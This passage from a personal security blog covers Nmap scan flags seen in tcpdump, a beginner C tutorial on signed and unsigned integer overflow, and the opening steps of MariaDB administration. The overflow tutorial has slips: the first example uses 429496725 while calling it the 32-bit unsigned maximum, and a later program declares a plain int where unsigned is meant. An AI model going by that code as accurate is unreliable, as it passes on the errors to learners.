<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">sudo tcpdump -nn --interface eth0 'port 445'</span></b></span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">16:17:06.538048 IP 10.0.0.108.45642 > 10.0.0.106.445: </span><b><span style="color: #fcff01;">Flags [F.]</span></b><span style="color: white;">, seq 0, ack 925611209, win 1024, length 0</span></span>
<span><span style="color: white;">16:17:06.538370 IP 10.0.0.106.445 > 10.0.0.108.45642: </span><b><span style="color: #fcff01;">Flags [R]</span></b><span style="color: white;">, seq 925611209, win 0, length 0</span></span></pre></div><p>... We have two packets. Notice the difference in the flags? The <b>-sW</b> has flags "<b>[.]</b>" and "<b>[R]</b>". The <b>-sM</b> have flags "<b>[F.]</b>" and "<b>[R]</b>".</p><p>You might have noticed, the last 3 outputs where there is the "[R]" RST flag, I did not put them in red. This is because this behavior was expected. The other two above, they are generated from your system's TCP/IP stack because it was not aware of the initial "<b>[S]</b>" packet being sent.</p><p>If you are reading this and wonder why I did not go more into what the different flags mean, then come hang out with us at one of the upcoming <b><a href="https://www.sans.org/cyber-security-courses/network-monitoring-threat-detection/" target="_blank">SANS SEC503: Network Monitoring and Threat Detection in Depth</a>, </b>where we go deep into packets learn more.</p><p>Hopefully this clear up any concerns users of Nmap have, as it relates to not seeing any difference in the outputs.</p><p><br />Reference:<br /><a href="https://linux.die.net/man/1/nmap">https://linux.die.net/man/1/nmap</a></p>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com1tag:blogger.com,1999:blog-7303400454979750101.post-32015323161172991312022-11-02T19:56:00.002-07:002022-11-10T22:55:16.280-08:00Beginning Integer Overflow/Underflow - Signed and Unsigned integers<p>Still on the journey providing mentorship to the <a href="https://www.cybersecurecatalyst.ca/" target="_blank">SANS/Ryerson/Rogers</a> Cyber Secure Catalyst Program.</p><p>In this post, the ask was to explain integer overflow/underflow. </p><p>Keeping it simple! The basic ideas, in the case of a 32-bit system or code compiled as 32 bits, an integer signed or unsigned, will occupy 32 bits. If we calculate 2**32 we get <b>4,294,967,296</b> possible values. In the case of unsigned int, this means, we should be able to get <b>0 to 4,294,967,295</b> as the possible values, as unsigned int only allows for positive values. Signed int on the other hand, allows for negative numbers and have a range of <b>−2,147,483,648 to 2,147,483,647</b>. Note, this problem is not only about 32-bit integer the idea is basically applying a value larger to a datatype than it was designed to accommodate. Int is just the example used in this case but it could have been something else.</p><p>Let's define a small program to learn more:</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: #cd2828; font-weight: bold;">#include <stdio.h></span>
<span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #447fcf;">main</span><span style="color: #d0d0d0;">()</span>
<span style="color: #d0d0d0;">{</span>
<span style="color: #999999; font-style: italic;">// Define a variable</span>
<span style="color: #6ab825; font-weight: bold;">unsigned</span> <span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #d0d0d0;">my_num</span> <span style="color: #d0d0d0;">=</span> <span style="color: #fcff01;"><b>429496725</b></span><span style="color: #d0d0d0;">;</span>
<span style="color: #999999; font-style: italic;">// Get the size of an integer for this compiled code</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"Size of my_num is :%d bytes or %d bits \n"</span><span style="color: #d0d0d0;">,</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num),</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num)</span> <span style="color: #d0d0d0;">*</span> <span style="color: #3677a9;">8</span><span style="color: #d0d0d0;">);</span>
<span style="color: #999999; font-style: italic;">// Print the value of my number to the screen</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"Current value for my_num is: %u \n"</span><span style="color: #d0d0d0;">,</span> <span style="color: #d0d0d0;">my_num);</span>
<span style="color: #6ab825; font-weight: bold;">return</span> <span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">;</span>
<span style="color: #d0d0d0;">}</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Let's compile and run this small program</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="background-color: #e3d2d2; color: #a61717;">┌──</span><span style="color: #d0d0d0;">(kali</span><span style="background-color: #e3d2d2; color: #a61717;">㉿</span><span style="color: #d0d0d0;">securitynik)-[~]</span>
<span style="background-color: #e3d2d2; color: #a61717;">└─$</span> <span style="color: #d0d0d0;">gcc</span> <span style="color: #d0d0d0;">intOverflow.c</span> <span style="color: #d0d0d0;">-o</span> <span style="color: #d0d0d0;">intOverflow</span> <span style="color: #d0d0d0;">-m32</span> <span style="color: #d0d0d0;">&&</span> <span style="color: #d0d0d0;">./intOverflow</span>
<span style="color: #d0d0d0;">Size</span> <span style="color: #d0d0d0;">of</span> <span style="color: #d0d0d0;">my_num</span> <span style="color: #d0d0d0;">is</span> <span style="color: #d0d0d0;">:</span><span style="color: #fcff01;"><b><span>4</span> <span>bytes</span> <span>or</span> <span>32</span> <span>bits</span> </b></span>
<span style="color: #d0d0d0;">Current</span> <span style="color: #d0d0d0;">value</span> <span style="color: #6ab825; font-weight: bold;">for</span> <span style="color: #d0d0d0;">my_num</span> <span style="color: #d0d0d0;">is:</span> <b><span style="color: #fcff01;"><span>429496725</span> </span></b>
</pre></td></tr></tbody></table></div>
<p></p><p>Above we see the size of the <i>my_num </i>integer is 4 bytes or 32 bits. We also see the current value is set to the maximum value possible for a 32-bit unsigned int. </p><p>What would happen if we add 1 to this program. </p><p>Here is the updated code.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: #cd2828; font-weight: bold;">#include <stdio.h></span>
<span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #447fcf;">main</span><span style="color: #d0d0d0;">()</span>
<span style="color: #d0d0d0;">{</span>
<span style="color: #999999; font-style: italic;">// Define a variable</span>
<span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #d0d0d0;">my_num</span> <span style="color: #d0d0d0;">=</span> <span style="color: #fcff01;"><b>4294967295</b></span><span style="color: #d0d0d0;">;</span>
<span style="color: #999999; font-style: italic;">// Get the size of an integer for this compiled code</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"Size of my_num is :%d bytes or %d bits \n"</span><span style="color: #d0d0d0;">,</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num),</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num)</span> <span style="color: #d0d0d0;">*</span> <span style="color: #3677a9;">8</span><span style="color: #d0d0d0;">);</span>
<span style="color: #999999; font-style: italic;">// Print the value of my number to the screen</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"%u + 1 = %u \n"</span><span style="color: #d0d0d0;">,</span> <span style="color: #d0d0d0;">my_num,</span> <b><span style="color: #fcff01;"><span>my_num</span> <span>+</span> <span>1</span></span></b><span style="color: #d0d0d0;">);</span>
<span style="color: #6ab825; font-weight: bold;">return</span> <span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">;</span>
<span style="color: #d0d0d0;">}</span>
</pre></td></tr></tbody></table></div>
<br /><div>When compiled and run, we get:</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="background-color: #e3d2d2; color: #a61717;">┌──</span><span style="color: #d0d0d0;">(kali</span><span style="background-color: #e3d2d2; color: #a61717;">㉿</span><span style="color: #d0d0d0;">securitynik)-[~]</span>
<span style="background-color: #e3d2d2; color: #a61717;">└─$</span> <span style="color: #d0d0d0;">gcc</span> <span style="color: #d0d0d0;">intOverflow.c</span> <span style="color: #d0d0d0;">-o</span> <span style="color: #d0d0d0;">intOverflow</span> <span style="color: #d0d0d0;">-m32</span> <span style="color: #d0d0d0;">&&</span> <span style="color: #d0d0d0;">./intOverflow</span>
<span style="color: #d0d0d0;">Size</span> <span style="color: #d0d0d0;">of</span> <span style="color: #d0d0d0;">my_num</span> <span style="color: #d0d0d0;">is</span> <span style="color: #d0d0d0;">:</span><span style="color: #3677a9;">4</span> <span style="color: #d0d0d0;">bytes</span> <span style="color: #d0d0d0;">or</span> <span style="color: #3677a9;">32</span> <span style="color: #d0d0d0;">bits</span>
<b><span style="color: #fcff01;"><span>4294967295</span> <span>+</span> <span>1</span> <span>=</span> <span>0</span></span></b>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Realistically, that value should have been <b>4294967295 + 1 = 4294967296</b>.</div><div><br /></div><div>It looks like we hit the overflow.</div><div><br /></div><div>What would happen if we update the code to add 10. Here we see:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="background-color: #e3d2d2; color: #a61717;">┌──</span><span style="color: #d0d0d0;">(kali</span><span style="background-color: #e3d2d2; color: #a61717;">㉿</span><span style="color: #d0d0d0;">securitynik)-[~]</span>
<span style="background-color: #e3d2d2; color: #a61717;">└─$</span> <span style="color: #d0d0d0;">gcc</span> <span style="color: #d0d0d0;">intOverflow.c</span> <span style="color: #d0d0d0;">-o</span> <span style="color: #d0d0d0;">intOverflow</span> <span style="color: #d0d0d0;">-m32</span> <span style="color: #d0d0d0;">&&</span> <span style="color: #d0d0d0;">./intOverflow</span>
<span style="color: #d0d0d0;">Size</span> <span style="color: #d0d0d0;">of</span> <span style="color: #d0d0d0;">my_num</span> <span style="color: #d0d0d0;">is</span> <span style="color: #d0d0d0;">:</span><span style="color: #3677a9;">4</span> <span style="color: #d0d0d0;">bytes</span> <span style="color: #d0d0d0;">or</span> <span style="color: #3677a9;">32</span> <span style="color: #d0d0d0;">bits</span>
<b><span style="color: #fcff01;"><span>4294967295</span> <span>+</span> <span>10</span> <span>=</span> <span>9</span></span></b>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>From above, we see we are wrapping around. Previously when we went over by 1 the number did 1-1 which gave a result of 0. When we went over by 10, our answer is 9. </div><div><br /></div><div>Anyhow that's it for the unsigned int overflow.</div><div><br /></div><div><br /></div><h2 style="text-align: left;"><b>Signed int</b></h2><div>As discussed above, in both the signed and unsigned int perspective, the size is 4 bytes or 32 bits. The difference between signed and unsigned, is that signed can accommodate negative numbers. While the range for unsigned is 0 to 4,294,967,295 signed values are from −2,147,483,648 to 2,147,483,647. Let's take the max and - 0 from it.</div><div><br /></div><div>Here is the code:</div></div><div><br /></div><!--HTML generated using hilite.me--><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: #cd2828; font-weight: bold;">#include <stdio.h></span>
<span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #447fcf;">main</span><span style="color: #d0d0d0;">()</span>
<span style="color: #d0d0d0;">{</span>
<span style="color: #999999; font-style: italic;">// Define a signed integer. Notice the "-"</span>
<span style="color: #6ab825; font-weight: bold;">signed</span> <span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #d0d0d0;">my_num_signed</span> <span style="color: #d0d0d0;">=</span> <b><span style="color: #fcff01;"><span>-</span><span>2147483648</span></span></b><span style="color: #d0d0d0;">;</span>
<span style="color: #999999; font-style: italic;">// Get the size of an signed integer for this compiled code</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"Size of my_num_signed is :%d bytes or %d bits \n"</span><span style="color: #d0d0d0;">,</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num_signed),</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num_signed)</span> <span style="color: #d0d0d0;">*</span> <span style="color: #3677a9;">8</span><span style="color: #d0d0d0;">);</span>
<span style="color: #999999; font-style: italic;">// Print the value of my number to the screen</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"%d - 0 = %d \n"</span><span style="color: #d0d0d0;">,</span> <span style="color: #d0d0d0;">my_num_signed,</span> <b><span style="color: #fcff01;"><span>my_num_signed</span> <span>-</span><span>0</span></span></b><span style="color: #d0d0d0;">);</span>
<span style="color: #6ab825; font-weight: bold;">return</span> <span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">;</span>
<span style="color: #d0d0d0;">}</span>
</pre></td></tr></tbody></table></div>
<div><br /></div><div><div>When compiled, here is what we have:</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="background-color: #e3d2d2; color: #a61717;">┌──</span><span style="color: #d0d0d0;">(kali</span><span style="background-color: #e3d2d2; color: #a61717;">㉿</span><span style="color: #d0d0d0;">securitynik)-[~]</span>
<span style="background-color: #e3d2d2; color: #a61717;">└─$</span> <span style="color: #d0d0d0;">gcc</span> <span style="color: #d0d0d0;">intOverflow.c</span> <span style="color: #d0d0d0;">-o</span> <span style="color: #d0d0d0;">intOverflow</span> <span style="color: #d0d0d0;">-m32</span> <span style="color: #d0d0d0;">&&</span> <span style="color: #d0d0d0;">./intOverflow</span>
<span style="color: #d0d0d0;">Size</span> <span style="color: #d0d0d0;">of</span> <span style="color: #d0d0d0;">my_num_signed</span> <span style="color: #d0d0d0;">is</span> <span style="color: #d0d0d0;">:</span><span style="color: #3677a9;">4</span> <span style="color: #d0d0d0;">bytes</span> <span style="color: #d0d0d0;">or</span> <span style="color: #3677a9;">32</span> <span style="color: #d0d0d0;">bits</span>
<b><span style="color: #fcff01;"><span>-</span><span>2147483648</span> <span>-</span> <span>0</span> <span>=</span> <span>-</span><span>2147483648</span>
</span></b></pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>The above is expected as <b>-2147483648 - 0 = -2147483648.</b></div><div><br /></div><div>Let's modify the code to -1</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: #cd2828; font-weight: bold;">#include <stdio.h></span>
<span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #447fcf;">main</span><span style="color: #d0d0d0;">()</span>
<span style="color: #d0d0d0;">{</span>
<span style="color: #6ab825; font-weight: bold;">signed</span> <span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #d0d0d0;">my_num_signed</span> <span style="color: #d0d0d0;">=</span> <b><span style="color: #fcff01;"><span>-</span><span>2147483648</span></span></b><span style="color: #d0d0d0;">;</span>
<span style="color: #999999; font-style: italic;">// Get the size of an signed integer for this compiled code</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"Size of my_num_signed is :%d bytes or %d bits \n"</span><span style="color: #d0d0d0;">,</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num_signed),</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num_signed)</span> <span style="color: #d0d0d0;">*</span> <span style="color: #3677a9;">8</span><span style="color: #d0d0d0;">);</span>
<span style="color: #999999; font-style: italic;">// Print the value of my number to the screen</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"%d - 1 = %d \n"</span><span style="color: #d0d0d0;">,</span> <span style="color: #d0d0d0;">my_num_signed,</span> <b><span style="color: #fcff01;"><span>my_num_signed</span> <span>-</span><span>1</span></span></b><span style="color: #d0d0d0;">);</span>
<span style="color: #6ab825; font-weight: bold;">return</span> <span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">;</span>
<span style="color: #d0d0d0;">}</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>When this is compiled we see </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="background-color: #e3d2d2; color: #a61717;">┌──</span><span style="color: #d0d0d0;">(kali</span><span style="background-color: #e3d2d2; color: #a61717;">㉿</span><span style="color: #d0d0d0;">securitynik)-[~]</span>
<span style="background-color: #e3d2d2; color: #a61717;">└─$</span> <span style="color: #d0d0d0;">gcc</span> <span style="color: #d0d0d0;">intOverflow.c</span> <span style="color: #d0d0d0;">-o</span> <span style="color: #d0d0d0;">intOverflow</span> <span style="color: #d0d0d0;">-m32</span> <span style="color: #d0d0d0;">&&</span> <span style="color: #d0d0d0;">./intOverflow</span>
<span style="color: #d0d0d0;">Size</span> <span style="color: #d0d0d0;">of</span> <span style="color: #d0d0d0;">my_num_signed</span> <span style="color: #d0d0d0;">is</span> <span style="color: #d0d0d0;">:</span><span style="color: #3677a9;">4</span> <span style="color: #d0d0d0;">bytes</span> <span style="color: #d0d0d0;">or</span> <span style="color: #3677a9;">32</span> <span style="color: #d0d0d0;">bits</span>
<b><span style="color: #fcff01;"><span>-</span><span>2147483648</span> <span>-</span> <span>1</span> <span>=</span> <span>2147483647</span>
</span></b></pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Oh! oh! oh! oh! What we expect is that <b>-2147483648 -1 should equal -2,147,483,649</b>. Therefore, above resulted in an underflow.</div><div><br /></div><div>Similarly, if we -10 we see:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="background-color: #e3d2d2; color: #a61717;">┌──</span><span style="color: #d0d0d0;">(kali</span><span style="background-color: #e3d2d2; color: #a61717;">㉿</span><span style="color: #d0d0d0;">securitynik)-[~]</span>
<span style="background-color: #e3d2d2; color: #a61717;">└─$</span> <span style="color: #d0d0d0;">gcc</span> <span style="color: #d0d0d0;">intOverflow.c</span> <span style="color: #d0d0d0;">-o</span> <span style="color: #d0d0d0;">intOverflow</span> <span style="color: #d0d0d0;">-m32</span> <span style="color: #d0d0d0;">&&</span> <span style="color: #d0d0d0;">./intOverflow</span>
<span style="color: #d0d0d0;">Size</span> <span style="color: #d0d0d0;">of</span> <span style="color: #d0d0d0;">my_num_signed</span> <span style="color: #d0d0d0;">is</span> <span style="color: #d0d0d0;">:</span><span style="color: #3677a9;">4</span> <span style="color: #d0d0d0;">bytes</span> <span style="color: #d0d0d0;">or</span> <span style="color: #3677a9;">32</span> <span style="color: #d0d0d0;">bits</span>
<b><span style="color: #fcff01;"><span>-</span><span>2147483648</span> <span>-</span> <span>10</span> <span>=</span> <span>2147483638</span>
</span></b></pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Let's wrap up with one more. This time, taking the max number on the positive side of the signed values.</div><div><br /></div><div>Here is the code</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: #cd2828; font-weight: bold;">#include <stdio.h></span>
<span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #447fcf;">main</span><span style="color: #d0d0d0;">()</span>
<span style="color: #d0d0d0;">{</span>
<span style="color: #6ab825; font-weight: bold;">signed</span> <span style="color: #6ab825; font-weight: bold;">int</span> <span style="color: #d0d0d0;">my_num_signed</span> <span style="color: #d0d0d0;">=</span> <span style="color: #3677a9;">2147483647</span><span style="color: #d0d0d0;">;</span>
<span style="color: #999999; font-style: italic;">// Get the size of an signed integer for this compiled code</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"Size of my_num_signed is :%d bytes or %d bits \n"</span><span style="color: #d0d0d0;">,</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num_signed),</span> <span style="color: #6ab825; font-weight: bold;">sizeof</span><span style="color: #d0d0d0;">(my_num_signed)</span> <span style="color: #d0d0d0;">*</span> <span style="color: #3677a9;">8</span><span style="color: #d0d0d0;">);</span>
<span style="color: #999999; font-style: italic;">// Print the value of my number to the screen</span>
<span style="color: #d0d0d0;">printf(</span><span style="color: #ed9d13;">"%d + 1 = %d \n"</span><span style="color: #d0d0d0;">,</span> <b><span style="color: #fcff01;"><span>my_num_signed,</span> <span>my_num_signed</span> <span>+</span> <span>1</span></span></b><span style="color: #d0d0d0;">);</span>
<span style="color: #6ab825; font-weight: bold;">return</span> <span style="color: #3677a9;">0</span><span style="color: #d0d0d0;">;</span>
<span style="color: #d0d0d0;">}</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>When compiled and run we see ...</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(32, 32, 32); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="background-color: #e3d2d2; color: #a61717;">┌──</span><span style="color: #d0d0d0;">(kali</span><span style="background-color: #e3d2d2; color: #a61717;">㉿</span><span style="color: #d0d0d0;">securitynik)-[~]</span>
<span style="background-color: #e3d2d2; color: #a61717;">└─$</span> <span style="color: #d0d0d0;">gcc</span> <span style="color: #d0d0d0;">intOverflow.c</span> <span style="color: #d0d0d0;">-o</span> <span style="color: #d0d0d0;">intOverflow</span> <span style="color: #d0d0d0;">-m32</span> <span style="color: #d0d0d0;">&&</span> <span style="color: #d0d0d0;">./intOverflow</span>
<span style="color: #d0d0d0;">Size</span> <span style="color: #d0d0d0;">of</span> <span style="color: #d0d0d0;">my_num_signed</span> <span style="color: #d0d0d0;">is</span> <span style="color: #d0d0d0;">:</span><span style="color: #3677a9;">4</span> <span style="color: #d0d0d0;">bytes</span> <span style="color: #d0d0d0;">or</span> <span style="color: #3677a9;">32</span> <span style="color: #d0d0d0;">bits</span>
<b><span style="color: #fcff01;"><span>2147483647</span> <span>+</span> <span>1</span> <span>=</span> <span>-</span><span>2147483648</span>
</span></b></pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>The above is obviously wrong as the sum of two positive numbers, should never give you a negative number.</div><div><br /></div><div>That's it for this post.</div><div><br /></div><div><br /></div><div><b>References:</b></div><div><a href="https://www.cs.utexas.edu/~shmat/courses/cs361s/blexim.txt" target="_blank">https://www.cs.utexas.edu/~shmat/courses/cs361s/blexim.txt</a></div><div><a href="https://stackoverflow.com/questions/18203609/does-d-in-string-format-work-for-unsigned-integers-also" target="_blank">https://stackoverflow.com/questions/18203609/does-d-in-string-format-work-for-unsigned-integers-also</a></div><div><a href="https://www.welivesecurity.com/2022/02/21/integer-overflow-how-it-occur-can-be-prevented/" target="_blank">https://www.welivesecurity.com/2022/02/21/integer-overflow-how-it-occur-can-be-prevented/</a></div><div><a href="https://www.acunetix.com/blog/web-security-zone/what-is-integer-overflow/" target="_blank">https://www.acunetix.com/blog/web-security-zone/what-is-integer-overflow/</a></div></div><p></p></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-14919597376459987342022-10-25T18:30:00.002-07:002022-10-25T18:30:21.567-07:00Beginning MariaDB / MySQL - Basic Administration Stuff<p>As I continue being a mentor for the <a href="https://www.cybersecurecatalyst.ca/" target="_blank">SANS/Ryerson/Rogers</a> Cyber Secure Catalyst program and as the group goes through working with database, I was asked to provide some guidance on using MariaDB/MySQL. The guidance I've provided below is meant to address the questions asked directly via the mentor session while also going a bit deeper into some of the basics that you should know, not only for MariaDB but also for any SQL Server database server administration.</p><p>With that in mind, let's get into the blog post.</p><p>First, verify the version of MySQL currently installed.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ mysql --version </span>
<span style="color: white;">mysql Ver 15.1 Distrib 10.6.8-MariaDB, for debian-linux-gnu (x86_64) using EditLine wrapper</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Looking to see if MySQL is running</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ sudo ss --numeric --listening --tcp --processes </span>
<span style="color: white;">State Recv-Q Send-Q Local Address:Port Peer Address:Port Process </span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>At this point, it looks like it is not. Starting the MySQL service.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ sudo systemctl start mysql.service</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Verifying once again, the service is available</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ sudo ss --numeric --listening --tcp --processes </span>
<span style="color: white;">State Recv-Q Send-Q Local Address:Port Peer Address:Port Process </span>
<span style="color: white;">LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* users:(("mariadbd",pid=2213,fd=21))</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>With the service available, time to connect to it. </p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ sudo mysql</span>
<span style="color: white;">Welcome to the MariaDB monitor. Commands end with ; or \g.</span>
